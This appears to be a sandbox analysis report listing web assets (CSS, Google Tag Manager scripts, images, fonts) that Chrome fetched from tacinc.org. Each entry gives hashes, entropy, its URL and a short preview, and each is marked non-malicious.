                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):208
                                                                                                                                                                                                                              Entropy (8bit):4.749632897976469
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:tBuvTrkjTri3mc4slm0QgJlFMuxQgtuAtWKqY:t2r2ri3I0QgHFEggxY
                                                                                                                                                                                                                              MD5:51F8F6F0C4882A96FA2A99BA36CA20A6
                                                                                                                                                                                                                              SHA1:5E94797FA0A0F9D0662E4870CFCCE6ADCFF47D25
                                                                                                                                                                                                                              SHA-256:2CFE281A2FAE81D9AAE35EEB56D0C7C012FCA92EB743241179BAB9472DC9AFC5
                                                                                                                                                                                                                              SHA-512:D8788E24D7FD0B4FD982DAC06423495ED84CE54D2EC215A35947929E20D6069A3B22FF29886101A665AE3C15B6F81F2D4D93A83327418FC05934C359AAE8F579
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:<svg enable-background="new -29 6 39.6 40" viewBox="-29 6 39.6 40" xmlns="http://www.w3.org/2000/svg"><path d="m7.9 10.8-2.2-2.1-15 15-15-15-2.1 2.1 15 15-15 15 2.1 2.2 15-15.1 15 15.1 2.2-2.2-15-15z"/></svg>
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 2560x1707, components 3
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):655713
                                                                                                                                                                                                                              Entropy (8bit):7.9848086836077234
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:gLhcLCFb98dZByw84wa2HgvqKIB83NgwF7FH92/Jy9x2MxkR:u6obOZBywEgSvoNgwF7osjqR
                                                                                                                                                                                                                              MD5:EAAF413F3A5DA4C9CAD03A927634E627
                                                                                                                                                                                                                              SHA1:3D947902353C1ED7059B44293744901C4C1A6303
                                                                                                                                                                                                                              SHA-256:6C2EA542DAAEFCA7FAED3E003E7658CD863D14D38C3EE1FDA738D3CA42E5BEEF
                                                                                                                                                                                                                              SHA-512:20912A932D64F2A5A4707EDE3AD34CBBEED892E73EE79352CB80B68E35B7C139D96139536EA8ED50AD6EC01E46C7FAC81F0AC47248A46B97200169C3D9F2E123
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/2020/12/ss_138257606_Brick_Apartment_with_Trees-scaled.jpg
                                                                                                                                                                                                                              Preview:......JFIF...........................................$......$ &...& 9-''-9B747BOGGOd_d................................$......$ &...& 9-''-9B747BOGGOd_d..............".................................................|..}."J.........8O.v".=h...:KS..d`.....w..k=H..:F..5x.u.-.3.I...}o.y...J.%.o!........YkH.=.y.u7P...k.V..s.{..iq.~m..w.oZ./q...4..]..Y}.F.:(z.m.nz.]^.[L.?4.le..?.Z...b..+d..3.:<..8zh...[..RJ=....GU.^.+...........&..S.i,g^...y.......w.t.k.9.z.......z..&~....P.`W...6.....hj........$..........6..X......s._.....G..9.u.....U.......f1"qNig,+..........oI.}<h......h.mU.l..G)....Q..O[./..$...!.Y/..g...65xM...;h-.p.@q..c...]...h...l.....e}[#.....i..d..L.*#.m.s;.+..'..3..._.F.filkzW....9.;..J.<.R...]._7}%....-..-.l(.m=..~.K.....Bba......W.4...;q......{xP...F..%.&#D..\H.8X...4.Z....>B.5x+(....s.?m.....8.M.K<?...s....g....z.....egoCZ8L.........&.$c..<F..*;^Cz.lj..+.d.X..#7\.W0.I..I...t..B.`k`L....L.Cd=B...I..|-p.9..,T5....R..m...-.[..|..t.....p6G......
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (52276)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):103541
                                                                                                                                                                                                                              Entropy (8bit):4.786948955646003
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:iwMCMPMCMjMCM4MCMwMCM3sVMX709gbPMfjSFOTyPG9XpgSLC1:O709gMGFiyPG9XiSLC1
                                                                                                                                                                                                                              MD5:B22C0BD9D05ED28C8AA3A2E73144D60F
                                                                                                                                                                                                                              SHA1:D2282E2BFD9E9D4CCD5915C4A630FFAED0F42F2F
                                                                                                                                                                                                                              SHA-256:F7C095ED6558111236FD7EF216DFA04E04DBF27DA9F3A02B892D2743094FF2D6
                                                                                                                                                                                                                              SHA-512:21E7E9D38D70BA2C89D31FAA9B48C27AD2AEF9028BFE78B021ED80CBB09C4A1E2BA1893A58F9D85262221513B83E7F3469DD23C9B689282597D745D629739B5A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/socialdriver/css/fontawesome/css/all.min.css
                                                                                                                                                                                                                              Preview:/*!. * Font Awesome Free 6.5.1 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2023 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65521), with no line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):674645
                                                                                                                                                                                                                              Entropy (8bit):5.137343701479134
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:PpZOwO1CA5kiDy0vF2qkiDdgbiLMFtOXM8oWiQZq/nUSVfQS+QHq/nUSVfQSPGlt:PpZOwO1CA5kiDy0vsqkiDFLMFJQZq/nV
                                                                                                                                                                                                                              MD5:C045175B7BB29341A2BF383D67048E95
                                                                                                                                                                                                                              SHA1:8F6E51BD6E37B1CA83D6EE1C8851C6BC6BA01FCD
                                                                                                                                                                                                                              SHA-256:0E8B08D51D18D3AE080E34142DE2B0F7D391C89F94DD6041E80462EB1D66020D
                                                                                                                                                                                                                              SHA-512:A6B623B69AAD6DBDFB13D7AF626A069BECADE155C4865C4B52FAA5383FEDBC8280832147E655C55BEB75A5891C074D0F069A33FBC0A7B850B84E4F9B58052FE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/themes/socialdriver/css/style-spb.min.css
                                                                                                                                                                                                                              Preview:@charset "UTF-8";@media (min-width:1025px){.animate-hide,.animate-show,.meganav-wrap,a,body abbr{transition:all .2s ease-in-out!important;-moz-transition:all .2s ease-in-out!important;-webkit-transition:all .2s ease-in-out!important;-o-transition:all .2s ease-in-out!important}}@media (max-width:1025px){.animate-hide,.animate-show,.meganav-wrap,a,body abbr{transition:all 0s ease-in-out!important;-moz-transition:all 0s ease-in-out!important;-webkit-transition:all 0s ease-in-out!important;-o-transition:all 0s ease-in-out!important}}body:not(.user-role-developer) .elementor-general-section{display:none}.ui-helper-reset{font-family:inherit;font-size:inherit;line-height:inherit}.ui-accordion .ui-accordion-icons{padding:0!important}.mt0{margin-top:0!important}.mb0{margin-bottom:0!important}.mr0{margin-right:0!important}.ml0{margin-left:0!important}.pt0{padding-top:0!important}.pb0{padding-bottom:0!important}.pr0{padding-right:0!important}.pl0{padding-left:0!important}.bt0{border-top:0!importa
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65443), with CRLF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):1119482
                                                                                                                                                                                                                              Entropy (8bit):4.684617060660782
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:d1ZhYAZCkIzwLX5mRccR8uEJU2Ru5VH0Ps27H40LPTXQ/xXQ/yLELLZCX:d1ZhYAZCqZCX
                                                                                                                                                                                                                              MD5:6EE0E7A6450E394F82B7179B25E48DD7
                                                                                                                                                                                                                              SHA1:2703ABC5B4539058EE7DF2AD2C27F473FA867F6E
                                                                                                                                                                                                                              SHA-256:5E6AE06BD378BEE783873E4AC8A8F687BD7B973C77C8E25EB8C3BEFBC185AAA8
                                                                                                                                                                                                                              SHA-512:31619C9D6F539084913469F8618A7546F3A1342BDFD7FB25259E4AEE0C8209B19F6726216DAB9FC766EC70A7EC4C8A694A353159913A44FAD005F328E04743BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/hummingbird-assets/882817933c266f0cbbf21908d5879b38.css
                                                                                                                                                                                                                              Preview:/**handles:theme-style,font-style,elementor-theme-style,elementor-frontend,elementor-pro**/..@charset "UTF-8";#main-container .bg-blue-hero.--priced-out .elementor-text-editor,#main-container .custom-links-section p.first,.blog-content-feed-section .spb_blog_widget .blog-std-card .blog-details-wrap p,.blog-feed-page-heading p.first,.cta-img-left-wrapper p,.gform_wrapper form .gform_body .gform_fields .gfield .ginput_container input[type=date],.gform_wrapper form .gform_body .gform_fields .gfield .ginput_container input[type=datetime-local],.gform_wrapper form .gform_body .gform_fields .gfield .ginput_container input[type=email],.gform_wrapper form .gform_body .gform_fields .gfield .ginput_container input[type=month],.gform_wrapper form .gform_body .gform_fields .gfield .ginput_container input[type=number],.gform_wrapper form .gform_body .gform_fields .gfield .ginput_container input[type=search],.gform_wrapper form .gform_body .gform_fields .gfield .ginput_container input[type=tel],.gfo
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):335828
                                                                                                                                                                                                                              Entropy (8bit):4.832004764912201
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:cLa0kXArcKrNG3cQUN7zlQONC9HHPRF6YgXqevpAPOKjN3pg8y9cpoLwIVfIpQVC:uxfEc6t
                                                                                                                                                                                                                              MD5:57C27141BDDA011EF9CAC7E07D15E491
                                                                                                                                                                                                                              SHA1:157FB1CDA2295C9204B6854522C8DFF4B555C658
                                                                                                                                                                                                                              SHA-256:B3AFC9D7C47E6D9A879D28DDA8676F3A9732C19BE2CFB99DC7C2382759E3D7E8
                                                                                                                                                                                                                              SHA-512:63C99D6B1D1143F537C61A6CF01761C36F3D63CD2DFAC3EBE95C41717047E41E7D2246B8A76DFF90CF17BE53E9D97553B9017355BE1C63A639DA8457F1C276B8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/plugins/powerpack-elements/assets/css/min/frontend.min.css
                                                                                                                                                                                                                              Preview:div[class*=' pp-'],div[class^=pp-]{-webkit-box-sizing:border-box;box-sizing:border-box}.clearfix:after{clear:both;content:"";font-size:0;height:0;display:block;visibility:hidden}.elementor-widget-pp-video .elementor-widget-container{overflow:hidden}.pp-elementor-grid{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;position:relative}.pp-elementor-grid .pp-grid-item{position:relative}.pp-elementor-grid .pp-grid-item-wrap{float:left;margin-bottom:0;margin-left:0;-webkit-transition:background .2s cubic-bezier(.645,.045,.355,1);transition:background .2s cubic-bezier(.645,.045,.355,1)}.pp-hidden{display:none!important}.pp-v-hidden{opacity:0;visibility:hidden}.pp-icon{display:inline-block;line-height:1;text-align:center;-webkit-transition:all .3s;transition:all .3s}.pp-icon i,.pp-icon svg{width:1em;height:1em;position:relative;display:block}.pp-no-trans{-webkit-transition:none;transition:none}.pp-pos-abs{position:absolute}.pp-image-overlay,.pp-media-back
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (516)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):47088
                                                                                                                                                                                                                              Entropy (8bit):5.181080629098432
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:88pTAGPVd0cZxC5dUjl5jrmoSaMV3cYGBWbcuEQoVwVTI9HtJKCQNmw7j6Y6llGb:88pTAGPVd0cZxC5dUjl5jrmoSaMV3cYh
                                                                                                                                                                                                                              MD5:D26E6352715B1021B301085475F337A8
                                                                                                                                                                                                                              SHA1:8F64AEA15EA3BD863AE685F57090417C5CC53804
                                                                                                                                                                                                                              SHA-256:36CF38F4681C826FAA35782314394892921BE2B2CDDA9A60B54FB04A52521D7C
                                                                                                                                                                                                                              SHA-512:9CF9CF051903A66777B75F1D45972580570B7F6760A017C0ED84AE901A06F9E35F28EB03CFD970AEFD8ADD4068B6DEB56D11313E6AD00F6B2C74D13D7B152348
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://use.typekit.net/cab6zwi.css
                                                                                                                                                                                                                              Preview:/*. * The Typekit service used to deliver this font or fonts for use on websites. * is provided by Adobe and is subject to these Terms of Use. * http://www.adobe.com/products/eulas/tou_typekit. For font license. * information, see the list below.. *. * proxima-nova:. * - http://typekit.com/eulas/00000000000000003b9b306c. * - http://typekit.com/eulas/00000000000000003b9b306d. * - http://typekit.com/eulas/00000000000000003b9b3068. * - http://typekit.com/eulas/00000000000000003b9b3069. * - http://typekit.com/eulas/00000000000000003b9b306a. * - http://typekit.com/eulas/00000000000000003b9b306b. * - http://typekit.com/eulas/00000000000000003b9b305e. * - http://typekit.com/eulas/00000000000000003b9b305f. * - http://typekit.com/eulas/00000000000000003b9b3066. * - http://typekit.com/eulas/00000000000000003b9b3067. * - http://typekit.com/eulas/00000000000000003b9b3062. * - http://typekit.com/eulas/00000000000000003b9b3063. * - http://typekit.com/eulas/00000000000000003
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2710)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):240631
                                                                                                                                                                                                                              Entropy (8bit):5.552409242609979
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:OJEEXg48UXtL510PIUCM7/6fSnJJVh6HGJj0h6btPzuPbRvYfrs:O843XtLEXhUGJj0h6b9kbRGs
                                                                                                                                                                                                                              MD5:878C5B3E638C6D60B4D7D675149B1D58
                                                                                                                                                                                                                              SHA1:909CC9A75C00EAE59F62C935CBE2E6F5F840F4B8
                                                                                                                                                                                                                              SHA-256:2B86BA4708EF8B3C4DE9FD812D7F6C8CF5B51D83192F3F531A36F8A960AB2925
                                                                                                                                                                                                                              SHA-512:CD1BB649624D4E3F4F69B82985D952D5B0549DBE42FEA57E829E01883061682C3EF3251E45E3EC39EA62AF4B16BC20072A56E685DCE96C7F58CA3DB85FE0F77E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtm.js?id=GTM-PQDSBND
                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__e"},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-26451691-1","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__aev","vtp_varType":"TEXT"},{"function":"__aev","vtp_setDefaultValue":false,"vtp_varType":"URL","vtp_component":"IS_OUTBOUND","vtp_affiliatedDomains":"tacinc.org"},{"function":
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6599), with CRLF line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):6625
                                                                                                                                                                                                                              Entropy (8bit):5.055456115272625
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:BmdpLKaDVSjHY9ITCniaivDszHoiNsyr6W:CLtORjC/
                                                                                                                                                                                                                              MD5:124C3BC0C87F37324AFC0F7C270AC978
                                                                                                                                                                                                                              SHA1:A3D117284E53B0DC9E9AA225632EBA9FE6386AB3
                                                                                                                                                                                                                              SHA-256:EB2D59B1DF00F5C2549DB593EC68C156372B6B54393E7EF9C65921D97BC457D8
                                                                                                                                                                                                                              SHA-512:E5B9D9D43C39F0606D5C2C24BF5E63F9B04EAB0C0F89AEF4AEAE123B6F15EAADEE91E0AE798FF4A3B3976B6AD5C355D40F1FDF9EA5B48FCEBB86AA7A768D0D36
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/hummingbird-assets/0b1483fafd54a25959314aaba369349f.css
                                                                                                                                                                                                                              Preview:/**handles:ecs-styles**/...swiper-container.swiper-initialized .ecs-posts{overflow:visible}.ecs-post-loop .elementor-page-title{display:block}.ecs-loop-preview{height:100%;width:100%;background:#d3d3d3;border:solid 1px gray;padding:5px}.ecs-loop-preview h3{font-size:16px;font-weight:500}.ecs-loop-preview span{font-size:12px}.ecs-loop-preview .ecs-image-holder{width:100%;line-height:113px;background-color:grey;font-size:45px;text-align:center;vertical-align:middle;font-weight:900;color:#929191}.ecs-link-wrapper{cursor:pointer}.elementor-element-edit-mode.elementor-widget-ele-loop-item,.elementor-element-edit-mode.elementor-widget-ele-loop-item>.elementor-widget-container,.elementor-widget-ele-loop-item,.elementor-widget-ele-loop-item>.elementor-widget-container{height:100%}.elementor-widget-posts .ecs-posts .elementor-button-wrapper{margin-top:0}.ecs-post-loop .ast-article-single{background-color:none;border-bottom:none;margin:0;padding:0}.ecs-post-loop.ast-article-post{width:100%}.them
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):139360
                                                                                                                                                                                                                              Entropy (8bit):7.997683007805431
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:3072:UTj7TvXBWhLBnUyYw83Xs73bKUC8jYniBVdwI/v:W31GXYZsfXCYjw4v
                                                                                                                                                                                                                              MD5:AD4D0F0B16E2F11D32C503D92EF0E594
                                                                                                                                                                                                                              SHA1:576AD537E9E8627D090C1D0922571655EE20F884
                                                                                                                                                                                                                              SHA-256:671E5E13E02E264FA6895CB07950E66DB065BB7D532440A3187BE3088E2FEA24
                                                                                                                                                                                                                              SHA-512:AC109AAB07958AFC249C34872AA887FADCACE514494947F38AE0656CD11F7FE5FF3F19663B5906BF29F7A61C85514AE9BD8710C85138523F696D7F0300742985
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/2023/05/featImg_Homecoming-2@1200x675px-768x432.png
                                                                                                                                                                                                                              Preview:RIFFX ..WEBPVP8LL ../..k.?.9..4..b......'..3.....4 ......\L./ ;Z%...a.dH...m...~.....f2b.....+..S....5].<4!o..T-.=l.a...=6....Aju......V..d.+}...O.X....JN.9..##.B@.H..)P...RT.iD..TOb...........(.....................zC..T".A.j6.wn.../.J.E..`\.Y.U.:..c.I. ......4.....n.#.C4=..%0.J........M.DA.Z.&.IQ.L...v..!SQ"A.s0p...):p...........-`.Q...4+...&...-..u@..j..(`....L.d.....E..7A....7.j..$P. ....."M.....K:..V.1.X....R.Y.;b.-=...98.;..0.V.t,..:..........O.....y..lv>.R....U,FD.'..2...B...._ejz.l.).x.L.io..,.....[7..m$G........`...@.DE.O...f.j.*.@......./.....T.J".8j<kT.Ud.9.Qc..k....O.:j..}/y.9M8.u.Z..W....8{.......^.-...!..u.....*..t.j..D.~m.|..%0.YBH.Lc.......0.r.Ng..g>6...6....`..*-!R...XLv5.$;[.N.p...G@..:.W.....V..7.7"./..l).......x8.]....k..m$.S/G........*t.S..{5...s.9..#mI....... %...]a#.......u..4......,.V.V..M.~F.!...oI.,I.l.K.~....tf.....|TnvW..,..V:1..p....&w~.o...m$.~..:..e.`B&.)Q...69I.fON.c.$j.2.O.E|....D.A..l....i.po.v....y.t...
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6169)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6213
                                                                                                                                                                                                                              Entropy (8bit):5.471297172722513
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:BPIOhUwrI77GmiYoFiMEO/HatAQY4NXhsdnCMl2q3VMFVKdOlQGK0jDjY8k2:ZIKU1eYoFiGa3NXzk3KMd8Qqjpk2
                                                                                                                                                                                                                              MD5:C36740EBDAF3DFF3B9D43FB0E3B843E1
                                                                                                                                                                                                                              SHA1:AD4B9F4DB7DCFDB277D01C9E23A439753B2FBEC0
                                                                                                                                                                                                                              SHA-256:4B1AC8A583E3221087FCDAEC02A8F0C75C75A0E8BCC4D68C35552F5BE6387EAD
                                                                                                                                                                                                                              SHA-512:CC51D856A6F64AE68D554383B8C953E8F8231D0798F6D948CB8662F106D6EC08C359BD2CC757CAE03C5D9F16D859B73FD713B443C96ABC862672D20EAD1AAD23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:/*! elementor-pro - v3.24.0 - 09-10-2024 */.(()=>{"use strict";var e,r,a,n={},c={};function __webpack_require__(e){var r=c[e];if(void 0!==r)return r.exports;var a=c[e]={exports:{}};return n[e].call(a.exports,a,a.exports,__webpack_require__),a.exports}__webpack_require__.m=n,e=[],__webpack_require__.O=(r,a,n,c)=>{if(!a){var i=1/0;for(o=0;o<e.length;o++){for(var[a,n,c]=e[o],t=!0,_=0;_<a.length;_++)(!1&c||i>=c)&&Object.keys(__webpack_require__.O).every((e=>__webpack_require__.O[e](a[_])))?a.splice(_--,1):(t=!1,c<i&&(i=c));if(t){e.splice(o--,1);var b=n();void 0!==b&&(r=b)}}return r}c=c||0;for(var o=e.length;o>0&&e[o-1][2]>c;o--)e[o]=e[o-1];e[o]=[a,n,c]},__webpack_require__.f={},__webpack_require__.e=e=>Promise.all(Object.keys(__webpack_require__.f).reduce(((r,a)=>(__webpack_require__.f[a](e,r),r)),[])),__webpack_require__.u=e=>635===e?"code-highlight.d86022c8668c4b072592.bundle.min.js":519===e?"video-playlist.af20fd9fd8778929829e.bundle.min.js":375===e?"paypal-button.f4f64e46173f50701949.b
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1973), with no line terminators
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):1973
                                                                                                                                                                                                                              Entropy (8bit):4.708916863138726
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:syuPAztI1QnOsztIOQtve1iO2c3LI8AMhJPQIduiMhJP0fZU4Yr/ZLA9e6GJAGJt:vuPmnORvwtD6KJGiKJ8RUPAMvZnF
                                                                                                                                                                                                                              MD5:6F246AC4B52F2DAE4E151B1C80584868
                                                                                                                                                                                                                              SHA1:9C119B043D8761348C35CE53D6CF496A49987630
                                                                                                                                                                                                                              SHA-256:0A5EC0F1F0D2824019D24260A8F62371A53B80DE70962EF6A44E42932EE4B3CE
                                                                                                                                                                                                                              SHA-512:0245DB9852EB61C5E13AC943E00D50D606016545804776C843B6A8D950E8E28969EE41C9DD2ABD519D575ADC656BE63BFCEB4284840791FF25BD97064AE7D1F1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-content/uploads/elementor/css/post-2444.css
                                                                                                                                                                                                                              Preview:.elementor-2444 .elementor-element.elementor-element-3b9fc58{padding:0px 0px 0px 0px;}.elementor-2444 .elementor-element.elementor-element-cb3d961 > .elementor-element-populated{border-style:none;transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;}.elementor-2444 .elementor-element.elementor-element-cb3d961 > .elementor-element-populated > .elementor-background-overlay{transition:background 0.3s, border-radius 0.3s, opacity 0.3s;}.elementor-2444 .elementor-element.elementor-element-14a6744 > .elementor-widget-container{border-style:solid;border-width:1px 1px 1px 1px;border-color:#F1F1F1;border-radius:5px 5px 5px 5px;}.elementor-2444 .elementor-element.elementor-element-14a6744:not( .elementor-widget-image ) .elementor-widget-container{-webkit-mask-image:url( https://www.tacinc.org/wp-content/plugins/elementor/assets//mask-shapes/circle.svg );-webkit-mask-size:contain;-webkit-mask-position:center center;-webkit-mask-repeat:no-repeat;}.elementor-2444 .elementor-
                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8189)
                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                              Size (bytes):21464
                                                                                                                                                                                                                              Entropy (8bit):5.303481082929494
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:G/rsrDr8LVyraS3dtrqorqr8hrpCip8fuxNhBGX0CiS9rH/OrLrErJ29FkFvd:iS33Z5vK47kv
                                                                                                                                                                                                                              MD5:8FBC22C79D40119DDE9A5D16897002B9
                                                                                                                                                                                                                              SHA1:E9837519ACA724457792E2D5EE98A97A0367CDF9
                                                                                                                                                                                                                              SHA-256:7E84C9F8D71BC6EB2DAC2FCE59A6CAEA62DA51FFA8CF56B41806F59386AB1322
                                                                                                                                                                                                                              SHA-512:3118A198A3710C839C15D6C4B5DC9F9ADCD637913AF2E26F438B01C80B27281F4937E25AAD2817855D8B3EB36207C61AE16D62B17E698799C5316E86F52AC6FC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              URL:https://www.tacinc.org/wp-includes/js/jquery/ui/core.min.js
